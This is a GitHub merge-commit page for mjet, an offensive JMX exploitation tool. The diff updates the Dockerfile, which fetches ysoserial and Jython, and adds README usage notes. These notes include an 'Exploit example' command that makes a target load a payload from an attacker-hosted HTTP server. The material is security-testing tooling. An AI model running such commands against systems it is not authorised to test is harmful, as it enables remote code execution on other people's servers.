Merge pull request #10 from mogwailabs/dockerfile_improvement

Dockerfile improvement and docker docs
mogwailabs · Jul 1, 2021 · 31b18ee · 31b18ee
2 parents 3495467 + a4f4672
commit 31b18ee
Show file tree

Hide file tree

Showing 2 changed files with 20 additions and 3 deletions.
diff --git a/Dockerfile b/Dockerfile
@@ -1,10 +1,10 @@
-FROM ubuntu:latest
+FROM openjdk:13-alpine
 ENV TZ=Europe/Stockholm
 RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
-RUN apt-get update && apt-get install -y default-jdk wget git && rm -rf /var/lib/apt/lists/*
 COPY . /app
 RUN wget "http://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar" -O app/jython-standalone-2.7.0.jar \
 	&& wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar
 EXPOSE 8000
 WORKDIR /app
-ENTRYPOINT ["tail", "-f", "/dev/null"]
+ENTRYPOINT ["java", "-jar", "jython-standalone-2.7.0.jar", "mjet.py"]
+CMD ["-h"]
diff --git a/README.md b/README.md
@@ -412,6 +412,23 @@ $
 
 Reference: https://www.optiv.com/blog/exploiting-jmx-rmi
 
+### Docker
+
+Build and run the docker image
+
+```bash
+# Build
+docker build -t mjet .
+# Run Help
+docker run mjet
+# Exploit example
+docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000
+# Run Interactive into shell
+docker run --entrypoint /bin/sh -it mjet
+```
+
+By default the docker image exposes port 8000 for the HTTP server. If you need another port you need to remember to expose it!
+
 ## Contributing
 
 Feel free to contribute.